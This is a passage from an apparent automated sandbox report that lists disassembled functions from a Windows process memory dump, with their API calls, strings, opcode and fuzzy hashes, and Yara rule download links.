                                  • Opcode Fuzzy Hash: 8063af5fc6a305aa55618de34cc362d35a9b7e6f6258c07ea808d9d41b6e6077
                                  • Instruction Fuzzy Hash: 99215E72E04211E7DB289F1A9C456BAB6F5FF85350B56406DFC4D97350FB708D51C250
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017AB79, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0017ABB5
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • _wcslwr.MSVCRT ref: 0017AC29
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0017AC59
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$_wcslwr
                                  • String ID: [%s]
                                  • API String ID: 886762496-302437576
                                  • Opcode ID: fdc7e9a886cc5a470c5a6cc06a8b04dea8bd953e45f7d8906b880e1ede78ea3d
                                  • Instruction ID: 7555636b3edbe5e175ac28270c786f0f622b1be8d4e30aa0bb197128bbb67aed
                                  • Opcode Fuzzy Hash: fdc7e9a886cc5a470c5a6cc06a8b04dea8bd953e45f7d8906b880e1ede78ea3d
                                  • Instruction Fuzzy Hash: DE21A572A00219ABDB11DBE4DD85BBEBBB8AF58300F4840A9E909D3141EB74DE44CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00174506, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00167721: __iob_func.MSVCRT ref: 00167726
                                  • fprintf.MSVCRT ref: 00174522
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: __iob_funcfprintf
                                  • String ID: CMD Internal Error %s$%s$Null environment
                                  • API String ID: 620453056-2781220306
                                  • Opcode ID: 8bc397100939284c19258872dcfebbfafd26b7938b3cb931397c0ba7013bbcda
                                  • Instruction ID: 6a8e02067d9d0c45ed52804ff89a12a8d926a84f38f540ca4a14ddb792e4dc0e
                                  • Opcode Fuzzy Hash: 8bc397100939284c19258872dcfebbfafd26b7938b3cb931397c0ba7013bbcda
                                  • Instruction Fuzzy Hash: 4A017B37A442118BC7346B5C7C464A37374DBE0714315892BEC6E93584FBA05D428140
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00172950, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 00172979
                                  • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 0017298A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: RtlDllShutdownInProgress$ntdll.dll
                                  • API String ID: 1646373207-582119455
                                  • Opcode ID: acd066a8b141da39dda9338a3678cb3b849845e06f106fcf0eeb8c8d73c33018
                                  • Instruction ID: 6c0db4fda526ff678f7fd980408ae938ff945218513f0367fcc0629cd4953aaf
                                  • Opcode Fuzzy Hash: acd066a8b141da39dda9338a3678cb3b849845e06f106fcf0eeb8c8d73c33018
                                  • Instruction Fuzzy Hash: 38F09631A10328DF8B119F28BD0962E77B8EF55768745425AFC09D7610DB705E4187D1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001588D8, Relevance: 6.2, APIs: 4, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 00158991
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00158AAB
                                    • Part of subcall function 001636CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,0015590A,00000000), ref: 001636F0
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$CurrentDirectory
                                  • String ID:
                                  • API String ID: 168429351-0
                                  • Opcode ID: cd032da8577729e648fcb13de92a9ae65af9ef965918c06844bad7b1562388bf
                                  • Instruction ID: 4150a834945ace9fbc8530433596e8ce9f34748b261470f4941e72fc4fcd8c52
                                  • Opcode Fuzzy Hash: cd032da8577729e648fcb13de92a9ae65af9ef965918c06844bad7b1562388bf
                                  • Instruction Fuzzy Hash: 22616771608301DFD329DF29D88066BB7E5BFD8300F10892EF9A9D7250DB709948CB86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00155F75, Relevance: 6.2, APIs: 4, Instructions: 183COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _wcsnicmp$wcschr
                                  • String ID:
                                  • API String ID: 3270668897-0
                                  • Opcode ID: f77941292c3f68f9d14565864ed2a85675d1212a750cf7d428b5fc3a4f34774f
                                  • Instruction ID: 0eda49d0898c38bb80db08a1a7fc2f76a135c0085e0ea1b3ed9d5c9c2c465b0d
                                  • Opcode Fuzzy Hash: f77941292c3f68f9d14565864ed2a85675d1212a750cf7d428b5fc3a4f34774f
                                  • Instruction Fuzzy Hash: 86517935700610DBDB28AF688C2167F73A1EF94745BE5446EFC43AF2C1EB614E86C691
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015AF70, Relevance: 6.2, APIs: 4, Instructions: 179COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • _pipe.MSVCRT ref: 0015AF9F
                                    • Part of subcall function 0015DBCE: _dup.MSVCRT ref: 0015DBD5
                                  • longjmp.MSVCRT(0018B8B8,00000001), ref: 001712F1
                                    • Part of subcall function 0015DBFC: _dup2.MSVCRT ref: 0015DC10
                                    • Part of subcall function 0015DB92: _close.MSVCRT ref: 0015DBC1
                                  • _get_osfhandle.MSVCRT ref: 0015B047
                                  • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 0015B055
                                    • Part of subcall function 0015E040: memset.MSVCRT ref: 0015E090
                                    • Part of subcall function 0015E040: wcschr.MSVCRT ref: 0015E0F3
                                    • Part of subcall function 0015E040: wcschr.MSVCRT ref: 0015E10B
                                    • Part of subcall function 0015E040: _wcsicmp.MSVCRT ref: 0015E179
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                  • String ID:
                                  • API String ID: 1441200171-0
                                  • Opcode ID: fe2e2e170d7248f4ddc36db0ba66f016568b742719a9280535251b102cf301f6
                                  • Instruction ID: d93045cfcd376a0851d357e3cb9eeddff2b62cf252fcb847d222c01cd89b5890
                                  • Opcode Fuzzy Hash: fe2e2e170d7248f4ddc36db0ba66f016568b742719a9280535251b102cf301f6
                                  • Instruction Fuzzy Hash: 6F518630604701DFD734DF29E89662673F1EF95326B248A1DF87ACA6E1EB319885CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001602B0, Relevance: 6.2, APIs: 4, Instructions: 165COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: iswdigit
                                  • String ID:
                                  • API String ID: 3849470556-0
                                  • Opcode ID: 3c6fdd46a65faeabcb7878880f8f9956b4a452b68c0d09ebbcee4c5aa137ab3f
                                  • Instruction ID: 5ff57f99a1194b4dfdc2c7a0a35ecce41387e19e10cc13e2fa9ac1a8f9d4eb0e
                                  • Opcode Fuzzy Hash: 3c6fdd46a65faeabcb7878880f8f9956b4a452b68c0d09ebbcee4c5aa137ab3f
                                  • Instruction Fuzzy Hash: F851D670900104DFCB29DF69CD8527EB7B1FF48301F1581AAD80297391EB329EA6DB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00162D22, Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00163C29,?,00000000,-00000001,00000000,?,00000000), ref: 00162D87
                                  • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00163C29,?,00000000,-00000001,00000000,?,00000000), ref: 00162D91
                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00163C29,?,00000000,-00000001,00000000,?,00000000), ref: 00162DA4
                                  • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00163C29,?,00000000,-00000001,00000000,?,00000000), ref: 00162DAE
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ErrorMode$FullNamePath
                                  • String ID:
                                  • API String ID: 268959451-0
                                  • Opcode ID: b49dbaee8ff98f930cd6ac7aca982f306e9d145efafdadebdb17a502e366ce08
                                  • Instruction ID: c5f54ecb2ca22d6c4228c4e93ff31d769ee22440a7cfa72def32ccb48057358e
                                  • Opcode Fuzzy Hash: b49dbaee8ff98f930cd6ac7aca982f306e9d145efafdadebdb17a502e366ce08
                                  • Instruction Fuzzy Hash: 7D417B39600501EBCB28DFA8CC558BFB37DEF88704715891EE916CB650E771AEA1C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015EEF0, Relevance: 6.1, APIs: 4, Instructions: 94memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,0015E5F6,?,00000000,00000000,00000000), ref: 0015EF39
                                  • RtlFreeHeap.NTDLL(00000000,?,0015E5F6), ref: 0015EF40
                                  • _setjmp3.MSVCRT ref: 0015EFA5
                                  • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,00000000,00008000,00000000,00000000,00000000,?,0015E5F6,?,00000000,00000000,00000000), ref: 0015F00D
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: FreeHeap$ProcessVirtual_setjmp3
                                  • String ID:
                                  • API String ID: 2613391085-0
                                  • Opcode ID: a8a7d72a2d563db5aa4861d6bfdc08d3aea285add683e1b34a228242f6c73026
                                  • Instruction ID: 7f6455f61889d90cbaf4d807e4a17e2d333d368ab741f6f5801b6f0d1023d1e4
                                  • Opcode Fuzzy Hash: a8a7d72a2d563db5aa4861d6bfdc08d3aea285add683e1b34a228242f6c73026
                                  • Instruction Fuzzy Hash: 2431BFB1B00210DFD718AF29AC497267AF9AB55716F14402FF829DBA60DB70DAC4CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017579A, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • longjmp.MSVCRT(0018B8B8,00000001,?,?,00163A4E,?,?,?,?,?,?,?,?), ref: 001757DE
                                  • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,00163A4E), ref: 0017581D
                                  • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,00163A4E), ref: 00175825
                                  • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,00163A4E), ref: 00175867
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: ErrorHeapMode$AllocByteCharMultiProcessWidelongjmp
                                  • String ID:
                                  • API String ID: 162963024-0
                                  • Opcode ID: e6a2b452a17eef9d93d56f29bfe49647da3c7ee3aa0935ad59de43efbaa45320
                                  • Instruction ID: 5393df654d421c80e18da44a812ea359a72553cf4367a609e2c7e059efc5f506
                                  • Opcode Fuzzy Hash: e6a2b452a17eef9d93d56f29bfe49647da3c7ee3aa0935ad59de43efbaa45320
                                  • Instruction Fuzzy Hash: 79213836600701ABD724BB798C469BF776BDFD43507088229FC0A87291EF718D5582E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001729B9, Relevance: 6.1, APIs: 4, Instructions: 85memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,?,?,?,?,?,?,?,?,?,?,00171C4B), ref: 00172A34
                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00171C4B), ref: 00172A3B
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00171C4B), ref: 00172A4D
                                  • RtlFreeHeap.NTDLL(00000000), ref: 00172A54
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heap$Process$AllocFree
                                  • String ID:
                                  • API String ID: 756756679-0
                                  • Opcode ID: 4d1a95f6ef58098071a83697f05c968c9754b7843e185f4163d90f88efbd1a03
                                  • Instruction ID: c9b72f0ccd5b613e36fc1f86450b310a457f71df5709f3d54e206af135afcdc1
                                  • Opcode Fuzzy Hash: 4d1a95f6ef58098071a83697f05c968c9754b7843e185f4163d90f88efbd1a03
                                  • Instruction Fuzzy Hash: D5310575A00604AFCB25DF69D88495ABBF5FF48310B0085AEED4AC7B11EB71E941CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00164E94, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00162F2C,-00000001,-00000001,-00000001,-00000001), ref: 00164ED6
                                  • longjmp.MSVCRT(0018B8B8,00000001,?,00000104,00000000,?,?,00162F2C,-00000001,-00000001,-00000001,-00000001), ref: 0016F016
                                  • _get_osfhandle.MSVCRT ref: 0016F01E
                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00162F2C,-00000001,-00000001,-00000001,-00000001), ref: 0016F02C
                                    • Part of subcall function 00160178: _get_osfhandle.MSVCRT ref: 00160183
                                    • Part of subcall function 00160178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0016D6A1), ref: 0016018D
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: BufferConsoleHeapInfoScreen_get_osfhandle$AllocFileProcessTypelongjmp
                                  • String ID:
                                  • API String ID: 1629431960-0
                                  • Opcode ID: 161d99729140fd7a193b79fec56e05823e1ab65bec633f45f3d49722ab455159
                                  • Instruction ID: 12483e6e21570898932b3027c39d601cb48687744c3db59575882ef6152eebfd
                                  • Opcode Fuzzy Hash: 161d99729140fd7a193b79fec56e05823e1ab65bec633f45f3d49722ab455159
                                  • Instruction Fuzzy Hash: CC217F71A003059FE7209F75EC45B7BB7E9EB58711B14482EF846C6242EB76D8518B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0015AEB0, Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wcstol.MSVCRT ref: 0015AEC7
                                  • wcstol.MSVCRT ref: 0015AED7
                                  • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 0015AF51
                                  • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?), ref: 0015AF5B
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: wcstol$lstrcmplstrcmpi
                                  • String ID:
                                  • API String ID: 4273384694-0
                                  • Opcode ID: 2a7fe445963982e66b5a3a4932f8a1d2012bb76f063f930649c8f4a150068235
                                  • Instruction ID: 0bfa80f1fe06920b937928a0329d1a67fa77d8bf8597f22630c768ebf2bd7413
                                  • Opcode Fuzzy Hash: 2a7fe445963982e66b5a3a4932f8a1d2012bb76f063f930649c8f4a150068235
                                  • Instruction Fuzzy Hash: 3311E4B2980426FB87655FB8CA0887E7B68FF053527920356EC11DFA50D732ED68D2D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017997C, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 001799B8
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(004D0043,-00000209,00000000,00000000,-00000209,?,00152178,00310030), ref: 001799FC
                                  • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00152178,00310030), ref: 00179A2E
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 00179A3E
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$DriveFullNamePathType
                                  • String ID:
                                  • API String ID: 3442494845-0
                                  • Opcode ID: 0620f78a32af130a4079c3352f3b9882ed7412dc4846e7014b35e8ffaf165338
                                  • Instruction ID: f2152a0f63ccf8386879bc5857e63239e44488c5293a00f4ca9bd0861f35320c
                                  • Opcode Fuzzy Hash: 0620f78a32af130a4079c3352f3b9882ed7412dc4846e7014b35e8ffaf165338
                                  • Instruction Fuzzy Hash: 67212171A0111DABDB11DFE8EC89BBEB7B8EF14304F0441AAA509E3141E774DE588B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00175662, Relevance: 6.1, APIs: 4, Instructions: 75registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,0017C100,0000001C,00174C85), ref: 00175695
                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,0017C100,0000001C,00174C85), ref: 001756B0
                                  • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 001756EF
                                  • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0017570C
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: QueryValue$ErrorLastOpen
                                  • String ID:
                                  • API String ID: 4270309053-0
                                  • Opcode ID: eeaba81e93a4e05c98844ef47d9ca62be1e6297e40c9d04b10b70378543e1f7b
                                  • Instruction ID: 08b3a84929e8fb90d2a31a85f69704ef168dca05451d58031cf559b22de4cf37
                                  • Opcode Fuzzy Hash: eeaba81e93a4e05c98844ef47d9ca62be1e6297e40c9d04b10b70378543e1f7b
                                  • Instruction Fuzzy Hash: 5F214FB1D00619EFDB149FA58C809FEB7BEFB58750B94812AF909F6190DBB18D418B70
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001556AE, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 88dbe981ca6652d67c970ede3f4f01e67b4ffe2a9571584cd1dd84f6570675a8
                                  • Instruction ID: 37618d07b0e0cbcb0e229e5ec64f92cca4e476cbc517ed51b31dfd95c43f7148
                                  • Opcode Fuzzy Hash: 88dbe981ca6652d67c970ede3f4f01e67b4ffe2a9571584cd1dd84f6570675a8
                                  • Instruction Fuzzy Hash: C811D031A00644EBDB255B29DC29BBE366DEB45321F24410AFC21CA0E0EB709D90CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017B91D, Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 0017B953
                                    • Part of subcall function 00160C70: ??_V@YAXPAX@Z.MSVCRT ref: 00160CBA
                                    • Part of subcall function 00160C70: memset.MSVCRT ref: 00160CDD
                                  • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 0017B98D
                                  • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0017B9A5
                                  • ??_V@YAXPAX@Z.MSVCRT ref: 0017B9B9
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: memset$DriveNamePathTypeVolume
                                  • String ID:
                                  • API String ID: 1029679093-0
                                  • Opcode ID: 807ac0c1e879b58af7398cc4c3506d7518bf3dc1d2263e1adc2d36aef85b98e3
                                  • Instruction ID: 4f8b28134601ba0499cb041046f1416c2163d9a3b73080cc7428b70ac6685245
                                  • Opcode Fuzzy Hash: 807ac0c1e879b58af7398cc4c3506d7518bf3dc1d2263e1adc2d36aef85b98e3
                                  • Instruction Fuzzy Hash: 91115171A04119ABDB10DBA9ECC9BBFBBB8EF54348F04006DA618D3241DB34DE54C7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0017916C, Relevance: 6.1, APIs: 4, Instructions: 66fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _get_osfhandle.MSVCRT ref: 00179185
                                  • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00178CA9,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0017918D
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 001791A4
                                  • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 001791D1
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                  • String ID:
                                  • API String ID: 2448200120-0
                                  • Opcode ID: 0d28c2b6774a60eddf6f7790db5a1dea23c65e912dc50aebf6d5a9a9e481a562
                                  • Instruction ID: 218dbecee2fcbe8525079cb25ec39e53770cb29e18d18f95fc083cfe8531a9d0
                                  • Opcode Fuzzy Hash: 0d28c2b6774a60eddf6f7790db5a1dea23c65e912dc50aebf6d5a9a9e481a562
                                  • Instruction Fuzzy Hash: 1511E331A00219ABDB25AB65EC89A7E777DEF85721F00802EF81C86191DF709D94CAA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00165D59, Relevance: 6.1, APIs: 4, Instructions: 60memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 00165D9D
                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00165DA4
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
